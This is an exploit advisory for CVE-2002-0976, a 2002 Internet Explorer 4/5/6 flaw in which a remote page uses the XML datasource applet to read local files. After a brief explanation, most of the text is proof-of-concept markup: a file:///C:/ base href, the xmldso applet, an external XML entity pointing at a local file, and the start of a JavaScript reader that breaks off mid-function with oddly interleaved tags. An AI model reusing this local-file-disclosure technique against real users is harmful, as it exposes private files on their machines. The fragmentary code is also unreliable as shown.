Microsoft Internet Explorer 4/5/6 - XML Datasource Applet File Disclosure

Related Vulnerabilities: CVE-2002-0976  
Publish Date: 17 Aug 2002
Author: Jelmer

A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.

Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.

<base href="file:///C:/">
<applet code="" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
<script language="javascript">
function showIt() {
var jelmer = xmldso.getDocument();